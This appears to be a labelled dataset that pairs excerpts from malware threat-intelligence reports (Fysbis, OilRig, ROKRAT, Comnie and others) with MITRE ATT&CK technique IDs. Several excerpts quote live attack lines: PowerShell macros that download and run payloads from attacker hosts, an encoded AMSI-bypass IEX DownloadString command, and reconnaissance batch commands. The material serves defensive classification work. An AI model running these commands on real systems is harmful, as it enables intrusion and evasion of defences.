{"text1":"Summary information for the three binaries we analyzed follows:    MD5 364ff454dcf00420cff13a57bcb78467   SHA-256 8bca0031f3b691421cb15f9c6e71ce19335 5d2d8cf2b190438b6962761d0c6bb   ssdeep 3072:n+1R4tREtGN4qyGCXdHPYK9l0H786 O26BmMAwyWMn\/qwwiHNl:n+1R43QcIL XdF0w6IBmMAwwCwwi   Size 141.2 KB (144560 bytes)   Type ELF 64-bit (stripped)   Install as root \/bin\/rsyncd   Root install desc synchronize and backup service   Install as non-root ~\/.config\/dbus-notifier\/dbus-inotifier   Non-root install desc system service d-bus notifier   C2 azureon-line[.]com (TCP\/80)   Usage Timeframe Late 2014    Table 1: Sample 1 \u2013 Late 2014 Sofacy 64-bit Fysbis    MD5 075b6695ab63f36af65f7ffd45cccd39   SHA-256 02c7cf55fd5c5809ce2dce56085ba43795f2 480423a4256537bfdfda0df85592   ssdeep 3072:9ZAxHANuat3WWFY9nqjwbuZf454U NqRpROIDLHaSeWb3LGmPTrIW33HxIajF: 9ZAxHANJAvbuZf454UN+rv eQLZPTrV3Z   Size 175.9 KB (180148 bytes)   Type ELF 32-bit (stripped)   Install as root \/bin\/ksysdefd   Root install desc system kernel service defender   Install as non-root ~\/.config\/ksysdef\/ksysdefd   Non-root install desc system kernel service defender   C2 198.105.125[.]74 (TCP\/80)   Usage Timeframe Early 2015    Table 2: Sample 2 \u2013 Early 2015 Sofacy 32-bit Fysbis    MD5 e107c5c84ded6cd9391aede7f04d64c8   SHA-256 fd8b2ea9a2e8a67e4cb3904b49c789d57ed 9b1ce5bebfe54fe3d98214d6a0f61   ssdeep 6144:W\/D5tpLWtr91gmaVy+mdckn6BCUd c4mLc2B9:4D5Lqgkcj+   Size 314.4 KB (321902 bytes)   Type ELF 64-bit (not stripped)   Install as root \/bin\/ksysdefd   Root install desc system kernel service defender   Install as non-root ~\/.config\/ksysdef\/ksysdefd   Non-root install desc system kernel service defender   C2 mozilla-plugins[.]com (TCP\/80)   Usage Timeframe Late 2015    Table 3: Sample 3 \u2013 Late 2015 Sofacy 64-bit Fysbis Overall, these binaries are assessed as low sophistication, but effective","labels":"['T1082', 'T1543.003', 'T1569.002']"}
{"text1":"System info:  Computer name System info using: cmd \/c systeminfo >%temp%\\temp.ini List of currently running process using: cmd \/c tasklist >%temp%\\temp.ini    Exfiltration  The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern:  From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt","labels":"['T1082', 'T1074', 'T1057', 'T1486']"}
{"text1":"Team member or team identifier Analysis of the OwaAuth web shell revealed a PDB string with the \"SyberSpace\" username (see Figure 20)","labels":"['T1033', 'T1505.003']"}
{"text1":"Techniques for Analysis When I was analyzing this sample, the malware was unable to connect to its C2.\u00a0 However, I was still able to analyze the network traffic of the sample.\u00a0 How, you might ask?\u00a0 Using a hex editor and a script I wrote to encrypt text using the algorithm that this sample uses, I encrypted my own C2 address (192.168.1.108:7721) and replaced the hardcoded C2 address with my own encrypted address.\u00a0 I then opened a listener on my own IP on the respective port.\u00a0 \u00a0 [Screenshot 3] comparison of My IP (Left) vs C2 IP (Right) Next, using a debugger, I set a couple breakpoints in the Internet Communications function and ran the malware.\u00a0 The malware sample then connected to my IP and sent information to me, which I was able to observe using Wireshark.\u00a0 After I\u2019d captured the traffic, I was able to write another script to decrypt and decompress the traffic in order to view the data being sent.\u00a0 Additionally, I then wrote a socket script that detects the Gh0stRAT variant traffic, automatically decrypts the traffic, and then extracts the Implant_Opcodes for the sample.\u00a0 A second version of the script allows commands to be sent back to the malware, after I enumerated the exact command format for the sample.\u00a0  [Screenshot 4] Output of Version 1 of the script So far, the 2 opcodes that the sample has sent are 0x65 and 0x66, or Implant_Heartbeat and Implant_Login, respectively.\u00a0 \u201cHitting between the heartbeats\u201d When sending commands, first the sample must login in with 0x65, then you can send commands to it.\u00a0 However, you have to move fast as the sample will send an Implant_Heartbeat followed by an Implant_Login every 10 seconds or so, and if you try to send a command to the sample as it is responding with either opcode, it will ignore the command.\u00a0 A proof of concept of the command script can be found\u00a0here\u00a0, while the Implant extraction script and the Command Script will be included in the Appendix","labels":"['T1573', 'T1132']"}
{"text1":"TG-3390 actors favor At.exe to create scheduled tasks for executing commands on remote systems","labels":"['T1053.005', 'T1059']"}
{"text1":"TG-3390 actors frequently change the C2 domain's A record to point to the loopback IP address 127.0.0.1, which is a variation of a technique known as \"parking.\" Other variations of parking point the IP address to Google's recursive name server 8.8.8.8, an address belonging to Confluence, or to other non-routable addresses","labels":"['T1573', 'T1016']"}
{"text1":"TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations, preferring to issue commands via an internally accessible web shell rather than HttpBrowser or PlugX","labels":"['T1059', 'T1505.003']"}
{"text1":"The agent control panel has three tabs that have interfaces that allow the actor to issue commands, as well as upload and download files to and from the agent","labels":"['T1543.001', 'T1105']"}
{"text1":"The assembly code used to create the shellcode can be obtained from: https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/external\/source\/shellcode\/windows\/x86\/src\/block\/block_api.asm https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/external\/source\/shellcode\/windows\/x86\/src\/block\/block_reverse_http.asm The purpose of the shellcode is to obtain additional shellcode to execute using an HTTP request to the URL \u201chxxp:\/\/45.76.128[.]165:4443\/0w0O6\u201d","labels":"['T1071', 'T1064']"}
{"text1":"The backdoors they are deploying are difficult to detect and a significant threat to the privacy and security of enterprises, allowing attackers to steal information, delete files, install malware, and more","labels":"['T1518.001', 'T1070.004']"}
{"text1":"The C2 communications begins with a beacon to the following URL: hxxp:\/\/www.windowspatch[.]com\/khc?<hex(STDOUT of whoami command)> If the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command results sent by the Trojan to the C2 in the URL","labels":"['T1033', 'T1571', 'T1008', 'T1043']"}
{"text1":"The code obtains the external IP address via an HTTP request using to \u201chttp:\/\/checkip.dyndns.org\/\u201d and uses a regular expression to locate an IP address from the HTTP response","labels":"['T1071', 'T1016']"}
{"text1":"The code then decodes this set of import symbols and resolves addresses for its networking and data stealing functionality: InternetCloseHandle InternetReadFile HttpSendRequestA HttpOpenRequestA HttpQueryInfoA InternetConnectA InternetCrackUrlA InternetOpenA InternetSetOptionW GetAdaptersInfo Much like the prior office monkey \u201catiumdag.dll\u201d component, this code collects identifying system information using standard win32 API calls: Computer name \u2013 GetComputerNameW User name \u2013 GetUserNameW Adapter GUID, ip address, mac address \u2013 GetAdaptersInfo Windows version \u2013 GetVersionExW It then uses the runtime resolved networking API calls to send the collected data back to a hardcoded c2 and set of urls","labels":"['T1106', 'T1140', 'T1016']"}
{"text1":"The command handler obtains a command identifier from the C2 server and adds 0xFFFFFF9B to this value and then uses a switch statement to determine the appropriate command to execute","labels":"['T1016', 'T1059']"}
{"text1":"The configuration data used by the backdoor has the following structure: #pragma pack(push, 1) struct st_cncconfig {   _WORD id;   _BYTE byte2;   _BYTE byte3;   _QWORD pCnCBeg;   _QWORD pCnCEnd;   _QWORD pLastElement; }; #pragma pack(pop) To be able to enter the data into the database, Linux.BackDoor.Fysbis.1 converts the configuration data into the following structure: #pragma pack(push, 1) struct st_crypted_config_data {   _WORD id;   _BYTE byte2;   _BYTE byte3;   char* pCnC;  }; #pragma pack(pop) Before the configuration data is encrypted with the RC4 algorithm, 11 signature bytes are added to the end of the data (11 bytes are stored in the backdoor's body)","labels":"['T1005', 'T1140', 'T1027.002', 'T1041', 'T1560', 'T1486']"}
{"text1":"The contents of the batch files vary depending on the OS (x64 vs x86). The batch files perform these tasks:  Stop the service COMSysApp Configure the service to autostart (to set up persistence on the system) Modify registry keys to launch the DLL unser svchost.exe Specify the malicious DLL path to be loaded into the svchost process","labels":"['T1055', 'T1112', 'T1064', 'T1569.002']"}
{"text1":"The data dump included the 0000000000.bat file, which when executed on an infected system would run the following commands to gather information to be sent back to the C2 server:  whoami hostname ipconfig \/all net user \/domain net group \/domain net group \u201cdomain admins\u201d \/domain net group \u201cExchange Trusted Subsystem\u201d \/domain net accounts \/domain net user net localgroup administrators netstat -an tasklist systeminfo reg query \u201cHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\u201d schtasks \/query \/FO List \/TN \u201cGoogleUpdatesTaskMachineUI\u201d \/V | findstr \/b \/n \/c:\u201dRepeat: Every:\u201d WMIC \/Node:localhost \/Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName \/Format:List  This batch script is also interesting as it uses echo commands to include headers before each of the command results","labels":"['T1069', 'T1087']"}
{"text1":"The data field within the message is a string of custom base64 encoded data that the malware decodes using the same custom base64 routine mentioned earlier and decrypts it using AES and the pre-shared key","labels":"['T1573', 'T1140', 'T1132']"}
{"text1":"The downloaded .7zip file contains a .lnk file that, once pressed, initializes the malware","labels":"['T1547.009', 'T1105']"}
{"text1":"The dropper installs the backdoor, sets its attributes to \u201chidden\u201d, and sets a random file date and time When the dropper installs the backdoor, it sets its attributes to \u201chidden\u201d and sets file date and time to\u00a0 random values using the touch command: touch \u2013t YYMMDDMM \u201c\/path\/filename\u201d > \/dev\/null","labels":"['T1070.006', 'T1564.001', 'T1124']"}
{"text1":"The encrypted message is then Base64 encoded, replacing all the \u2018\/\u2019 and \u2018+\u2019 characters with the \u2018.\u2019 and \u2018-\u2019 characters, respectively","labels":"['T1027', 'T1132']"}
{"text1":"The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it","labels":"['T1036', 'T1064']"}
{"text1":"The file is saved to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe  00 00 04  Content after command ID is written to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad2.exe  00 00 05  The files notepad1.exe and notepad2.exe are concatenated together and written to C:\\Users\\[Username]\\AppData\\Local\\Temp\\newnotepad.exe and executed  00 00 06  The contents of the following file is sent to the server: C:\\Users\\[Username]\\AppData\\Local\\Temp\\note.txt  00 00 07  The string following the command ID is executed using \"cmd \/C\" and results are sent to server   Links to APT3 On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment","labels":"['T1033', 'T1036', 'T1087', 'T1204']"}
{"text1":"The first email displays the following decoy document to the infected user and download the following payload:hxxp:\/\/discgolfglow[.]com:\/wp-content\/plugins\/maintenance\/images\/worker.jpgThe second email displays the following decoy document to the infected user and downloads the following payload:hxxp:\/\/acddesigns[.]com[.]au\/clients\/ACPRCM\/kingstone.jpgIn both cases, the downloaded payload is the ROKRAT malware.The first tasks of this variant of ROKRAT is to check the operating system version","labels":"['T1105', 'T1497']"}
{"text1":"The first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files: NOP sled composed of 0x90 and 0x91 opcodes The main purpose of the initial shellcode is to download second stage shellcode from hxxp:\/\/89.45.67[.]107\/rss\/5uzosoff0u.iaf","labels":"['T1064', 'T1027', 'T1105']"}
{"text1":"The following commands are available:    Command  SubCommand Description   VER  Generates the following IRC client command that will be sent to the C2 server: \u00a0 PRIVMSG <username> :\u00a0\u00a0\u00a0 8 LED= 20160124   KILL  Trojan disconnects from the IRC server and terminates itself   RESET  Trojan disconnects from the IRC server and runs the executable again   OS  Obtains the Windows version and responds to the C2 with the following message \u201cPRIVMSG <username> :<one of the following version strings>\u201d: \u00a0 Windows NT Windows 95 Windows 98 Windows ME Windows 2003 Windows XP Windows 7 Windows Vista Unkown os info   !SH EXEC Not supported    MD Creates a specified directory","labels":"['T1106', 'T1010']"}
{"text1":"The following commands are supported by the malware:  Command ID  Description  00 00 00  Content after command ID is written to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad1.exe  00 00 01  Deletes the files: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe C:\\Users\\[Username]\\AppData\\Local\\Temp\\newnotepad.exe  00 00 02  Malware exits  00 00 03  Malware downloads the URL that follows the command ID","labels":"['T1033', 'T1204']"}
{"text1":"The following functions are called when the application attempts to initialize the menu:ETransaksi.Speed(); \/\/ Legitimate class, but method is the first  wrapped function that leads to malicious code ProjectData.EndApp(); \/\/ Closes the application before rest of  legitimate Sales System Application functions are calledThe \u201cSpeed\u201d method in the legitimate ETransaksi class contains legitimate code from the Sales System Application; however, the author of this tool includes this code in an if\/else construct that bypasses these instructions by setting a false flag to skip the legitimate code and execute the next step to the malicious code","labels":"['T1140', 'T1036', 'T1027.001', 'T1189']"}
{"text1":"The following graph view from IDA shows these steps.These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into the cmd.exe process","labels":"['T1055', 'T1059']"}
{"text1":"The following HTTP request from the Helminth backdoor (SHA256: 1fb69090be8a2e11eeb220b26ee5eddf1e3fe81ffa59c47d47d01bf90c2b080c) downloaded the similar batch script: GET \/update-index.aspx?req=1786873725%5Cbat&m=d HTTP\/1.1 Host: update-kernal[.]net Connection: Keep-Alive We performed a code comparison to visualize the similarities between the batch script delivered as the default command in Poison Frog is to the script provided to the Helminth backdoor","labels":"['T1071', 'T1064']"}
{"text1":"The following screenshot shows the command execution functionality in action: \u00a0          Figure 4:\u00a0Command\u00a0Execution     The\u00a0paramString\u00a0parameter shown in the above screenshot\u00a0can be any command received from C&C","labels":"['T1113', 'T1059']"}
{"text1":"The frequent checking ensures that any changes made will be quickly followed, and the repeated attempts to run the Revenge RAT binary make it almost certain that even if the process is terminated, the RAT will be running again soon","labels":"['T1057', 'T1043']"}
{"text1":"The function builds the contents of a second file by concatenating several strings together, but this second file is a .sct file that the function will write to a file %TEMP%\\12-B-366.txt","labels":"['T1070.006', 'T1140']"}
{"text1":"The function will take another executable embedded in the initial Trojan as a resource named \u201cM\u201d, which it attempts to inject into the following process to execute: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe While it\u2019s configured to inject into cvtres.exe, the Trojan is also capable of injecting its code into the following process as well: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe \u00a0 Embedded injector Trojan The R payload discussed above is nothing more than an injector Trojan, which accepts a path to an executable and a buffer of code to inject into the process as arguments","labels":"['T1055.012', 'T1055']"}
{"text1":"The infection process is rather interesting, as it involves multiple layers of .NET assemblies that will eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another process","labels":"['T1055', 'T1105']"}
{"text1":"The information gathered is added to a string in the following structure: <IP address>|<computer name>|<domain>|<username>|<isAdmin flag>|<hasGarbage flag from config>|<hasStartup flag from config>|<\u201chybrid\u201d mode flag from config>|<sleep interval from config>|<jitter value from config> The payload will base64 encode this string and use its DNS tunneling protocol to transmit the data to the C2","labels":"['T1033', 'T1016']"}
{"text1":"The last query is to the subdomain ihc[.]stage[.]12019683[.]ns2[.]true-deals[.]com): \u00a0 The delivered second stage shellcode is encrypted:  METERPRETER: After decryption of the second stage shellcode, the shellcode deletes the \u2018MZ\u2019 prefix from within a very important part of the shellcode","labels":"['T1064', 'T1027']"}
{"text1":"The latter PowerShell injects a shellcode into its own process using well-known CreateThread and VirtualAlloc techniques: \u00a0 SHELLCODE: The shellcode phase of this attack is unique and demonstrates the constantly advancing abilities of attackers","labels":"['T1064', 'T1059.001']"}
{"text1":"The loader\u2019s main goal was to run a PowerShell command to execute shellcode","labels":"['T1059', 'T1059.001']"}
{"text1":"The lures are primarily documents of interest to Pakistani nuclear organizations and the Pakistani military as can be seen in the images below:  Figure 1 Lure extracted from a67220bcf289af6a99a9760c05d197d09502c2119f62762f78523aa7cbc96ef1  Figure 2 Lure extracted from 07d5509988b1aa6f8d5203bc4b75e6d7be6acf5055831cc961a51d3e921f96bd  Figure 3 Lure extracted from b8abf94017b159f8c1f0746dca24b4eeaf7e27d2ffa83ca053a87deb7560a571  Figure 4 Lure extracted from d486ed118a425d902044fb7a84267e92b49169c24051ee9de41327ee5e6ac7c2 and fd8394b2ff9cd00380dc2b5a870e15183f1dc3bd82ca6ee58f055b44074c7fd4 \u00a0 The payload from each of the malicious documents is an updated version of the BADNEWS malware family","labels":"['T1204', 'T1560']"}
{"text1":"The macro downloads a payload from hxxp:\/\/lokipanelhostingpanel[.]gq\/work\/kh\/1.exe (SHA256: 84ed59953f57f5927b9843f35ca3c325155d5210824d3b79b060755827b51f72) by running the following command line process:cmd.exe \/c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http:\/\/lokipanelhostingpanel[.]gq\/work\/kh\/1.exe','%Public%\\\\\\\\svchost32.exe');Start-Process '%Public%\\\\\\\\svchost32.exeThe macro then attempts to kill Microsoft Office and Windows Defender processes using the \u2018taskkill\u2019 command","labels":"['T1055.012', 'T1057']"}
{"text1":"The macro saves the chkSrv.vbs script to the system, which is responsible for running the IntelSecurityAssistManager.exe payload (OopsIE Trojan) and cleaning up the installation by deleting the two scheduled tasks, the Base.txt file, the ThreeDollars document, and the chkSrv.vbs script","labels":"['T1053.005', 'T1070.004']"}
{"text1":"The main function of the dropper All strings within the dropper, as well as the backdoor, are encrypted using a hardcoded RSA256 key","labels":"['T1140', 'T1027']"}
{"text1":"The malicious DLL is also responsible for terminating the cliconfg.exe process and deleting the malicious NTWDBLIB.dll using: cmd \/c taskkill \/im cliconfg.exe \/f \/t && del \/f \/q NTWDBLIB.DLL All the following capabilities described are implemented by the malicious service DLL implant unless specified.\u00a0\u00a0 Variant using North Korean Red Cross Another variant (hash: 9e2c0bd19a77d712055ccc0276fdc062e9351436) of the malicious Word dropper uses the same Base64-decoding scheme with a different custom key","labels":"['T1055', 'T1574.002']"}
{"text1":"The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download):  upload.bat, a batch script that the compromised machine will execute upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) \u00a0which the batch script will run and almost always uploads the results of download.rar to the cloud storage account silent.txt and period.txt, \u00a0small files sizes of 0-4 bytes that dictate the frequency to check in with the CnC  The threat actor will then download the results and then delete the files from the cloud storage account","labels":"['T1064', 'T1105']"}
{"text1":"The malware demonstrates its evasive behavior by checking for the presence of specific processes related to antimalware products:  The presence of any process with the keywords \u201cv3\u201d and \u201ccleaner.\u201d   Checking for antimalware or cleaner processes","labels":"['T1562.001', 'T1057']"}
{"text1":"The malware uses obfuscation in order to hide strings such as URL or User-Agent, the algorithm is based on bitwise (SUB 0x0F XOR 0x21), here is the decoded data:hxxp:\/\/old[.]jrchina[.]com\/btob_asiana\/udel_confirm.phpMozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E; InfoPath.3)The downloaded third payload is obfuscated using the same technique","labels":"['T1087', 'T1027']"}
{"text1":"The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive","labels":"['T1053.005', 'T1547.001']"}
{"text1":"The OopsIE Trojan is configured to use a C2 server hosted at:www.msoffice365cdn[.]com The Trojan will construct specific URLs to communicate with the C2 server and parses the C2 server\u2019s response looking for content within the tags <pre> and <\/pre>","labels":"['T1071', 'T1573', 'T1102', 'T1041', 'T1008']"}
{"text1":"The paths discovered are:  \u2022 C:\\Users\\leo\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\poopak\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\Vendetta\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\Turk\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd   Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based","labels":"['T1033', 'T1005', 'T1087', 'T1204']"}
{"text1":"The payload has a function it calls early on that tests to see which DNS query types are able to successfully reach the C2 server.\u00a0 It iterates through a list of types and the first DNS type to receive a response from the C2 server will be used for all communications between the payload and the C2 server, which are in the following order (editor\u2019s note: AC is not a\u00a0 DNS record type but is a mode where the trojan will perform a request for an A record requiring ac as a subdomain):  A AAAA AC \u2013 (see note above) CNAME MX TXT SRV SOA  The payload uses the built-in Windows nslookup application with specific parameters and specially crafted subdomains to communicate with the C2","labels":"['T1123', 'T1071', 'T1041', 'T1008']"}
{"text1":"The Payloads The delivery documents in this attack campaign loaded remote templates whose macros installed a variety of first-stage payloads","labels":"['T1064', 'T1027']"}
{"text1":"The payload then sets EIP to the entry point of the newly injected code using the SetThreadContext API, and finally calls the NtAlertResumeThread API function to run the injected code","labels":"['T1106', 'T1140']"}
{"text1":"The payload will communicate with its C2 server to obtain the session ID and pre-shared key and write it to this registry key in the following format: \u00a0 <session id>_<pre-shared key> \u00a0 To obtain the session ID and pre-shared key, the payload will first try to contact the C2 via an HTTPS GET request to the following URL: \u00a0 hxxps:\/\/www.rdppath[.]com\/ \u00a0 If the above request using HTTPS does not result in an HTTP 200 OK message or the response data has no alphanumeric characters, the code will attempt to communicate with the C2 server using HTTP via the following URL: \u00a0 hxxp:\/\/www.rdppath[.]com\/ \u00a0 The code to communicate with the C2 via HTTP exists within an exception handler","labels":"['T1071', 'T1008']"}
{"text1":"The payload will use a specific regular expressions dependent on the type of DNS query was used to obtain the command string, which can be seen in Table 2:    DNS TYPE Regex Pattern   A Address:\\s+(\\d+.\\d+.\\d+.\\d+)   AC \\d+-\\d+-(\\d+)-([\\w\\d+\/=]+)-\\d-.ac.$Global:domain   AAAA Address:\\s+(([a-fA-F0-9]{0,4}:{1,4}[\\w|:]+){1,8})   CNAME,MX,TXT,SRV,SOA (\\d+)-([\\w\\d\/=+]{0,})\\-.$Global:domain    Table 2 Types of responses provided by C2 These regular expressions are used to build strings that the payload will then subject to its command handler","labels":"['T1071', 'T1016']"}
{"text1":"The plugin uses the same network protocol as PLAINTEE and so we were able to trivially decode further commands that were sent.\u00a0 The following commands were observed:  tasklist ipconfig \/all  The attacker performed these two commands 33 seconds apart","labels":"['T1573', 'T1059']"}
{"text1":"The PowerShell command decodes to the following:$command = 'WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACAAIAAgACAAdAByAHkAewAgAAoAIAAgACAAIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgAgACAAIAAgAH0AYwBhAHQAYwBoAHsAfQAKACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAzADkALgA1ADkALgA0ADYALgAxADUANAA6ADMANAA4ADUALwBJAE0AbwA4AG8AbwBzAGkAZQBWAGEAaQAnACkAOwAKACAAIAAgACAA'         if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')          {                          $exec = $Env:windir + '\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded ' + $command             IEX $exec         }         else         {             $exec = [System.Convert]::FromBase64String($command)             $exec = [Text.Encoding]::Unicode.GetString($exec)             IEX $exec         }The script above checks the system architecture to determine if it is an x64 machine and attempts to execute a base64 encoded command that decodes to the following:[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};     try{      [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)     }catch{}     IEX (New-Object Net.WebClient).DownloadString('http:\/\/ 139.59.46[.]154:3485 \/IMo8oosieVai');This decoded PowerShell script attempts to download and execute a file using HTTP from the URL \u201chxxp:\/\/ 139.59.46[.]154:3485 \/IMo8oosieVai\u201d","labels":"['T1059.001']"}
{"text1":"The prior example decrypts to the following: mailto:121.126.211[.]94:8080;80;80 \u00a0 The following Python script may be used to decode the C2 data used by the newest Comnie variant:      12345678910111213141516171819202122232425262728293031323334353637383940  import base64import sysimport refrom string import maketransfrom struct import *import requestsdef rc4_crypt(data, key):\u00a0\u00a0S = range(256)\u00a0\u00a0j = 0\u00a0\u00a0out = []\u00a0\u00a0for i in range(256):\u00a0\u00a0\u00a0\u00a0j = (j + S[i] + ord( key[i % len(key)] )) % 256\u00a0\u00a0\u00a0\u00a0S[i] , S[j] = S[j] , S[i]\u00a0\u00a0i = j = 0\u00a0\u00a0for char in data:\u00a0\u00a0\u00a0\u00a0i = ( i + 1 ) % 256\u00a0\u00a0\u00a0\u00a0j = ( j + S[i] ) % 256\u00a0\u00a0\u00a0\u00a0S[i] , S[j] = S[j] , S[i]\u00a0\u00a0\u00a0\u00a0out.append(chr(ord(char) ^ S[(S[j] + S[i]) % 256]))\u00a0\u00a0return ''.join(out)def decode(data):\u00a0\u00a0o = \"\"\u00a0\u00a0for d in data:\u00a0\u00a0\u00a0\u00a0od = ord(d)\u00a0\u00a0\u00a0\u00a0o += chr((4 * (16 * od | od & 0xC) | (((od >> 4 | od & 0x30) >> 2))) & 0xFF)\u00a0\u00a0return obase64fixTable = maketrans(\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/\"[::-1], \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/\");def trans(string):\u00a0\u00a0return str(string).translate(base64fixTable)def altdecode(string):\u00a0\u00a0return base64.b64decode(trans(string))req = requests.get(sys.argv[1])fd = req.textoriginal_data = re.search(\"magnet:\/\\?([^\\?]+)\\?\", fd).group(1)parsed_data = altdecode(original_data)dataLength = unpack(\"<I\", parsed_data[64:68])[0]key = decode(parsed_data[0:64])data = parsed_data[dataLength*-1:]d = rc4_crypt(data, key)print(d)     \u00a0 Comnie will make attempts at connecting to the IP address above using the various ports specified","labels":"['T1573', 'T1048', 'T1486']"}
{"text1":"The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0","labels":"['T1027.002', 'T1027']"}
{"text1":"The results of the decoded data may be seen below: \u00a0  Figure 13 Decrypted information The decrypted data contains URLs for various online services that will be used by the attacker for downloading data that will contain the command and control (C2) server(s) and port(s) to be used by Comnie","labels":"['T1140', 'T1041', 'T1048']"}
{"text1":"The sample creates an array that contains the following strings for the Trojan to use as C2 locations: http:\/\/23.227.196[.]215\/ http:\/\/apple-iclods[.]org\/ http:\/\/apple-checker[.]org\/ http:\/\/apple-uptoday[.]org\/ http:\/\/apple-search[.]info Notice the last one is missing the trailing \u201c\/\u201d, which causes an issue when the Trojan attempts to use this string to build the remainder of the C2 URL, as the Trojan will append the next string in the URL directly to this string","labels":"['T1071', 'T1008']"}
{"text1":"The screenshots included remote desktop (RDP) sessions showing the Glimpse panel, a web browser session displaying a C2 panel called Scarecrow, web browser sessions into VPS administrative panels, and evidence of potential destructive attacks against OilRig servers","labels":"['T1113', 'T1021.001', 'T1505.003']"}
{"text1":"The script will first attempt to communicate with the C2 server using HTTPS (HTTP if unsuccessful), which involves GET requests using the session ID within the request\u2019s cookie in the PHPSESSID field, as seen in the example GET request:       GET \/ HTTP\/1.1User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/42.0.2311.135 Safari\/537.36 Edge\/12.246Host: www.rdppath[.]comCookie: PHPSESSID=<c2 provided session id>Connection: Keep-Alive     If the payload is unable to reach the C2 via HTTPS\/HTTP, the payload yet again falls back to DNS tunneling","labels":"['T1071', 'T1041', 'T1008']"}
{"text1":"The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script","labels":"['T1036', 'T1064']"}
{"text1":"The SecurityAssist task is responsible for running the following command line command that uses the Certutil application to decode the base64 encoded data in Base.txt and saves the decoded data to the file %PROGRAMDATA%\\IntelSecurityAssistManager.exe:cmd.exe \/c Certutil -decode %appdata%\\Base.txt %programdata%\\IntelSecurityAssistManager.exe & SchTasks \/Delete \/F \/TN SecurityAssist The macro also creates a second scheduled task named Conhost that waits two minutes and runs a VBScript %APPDATA%\\chkSrv.vbs","labels":"['T1140', 'T1036']"}
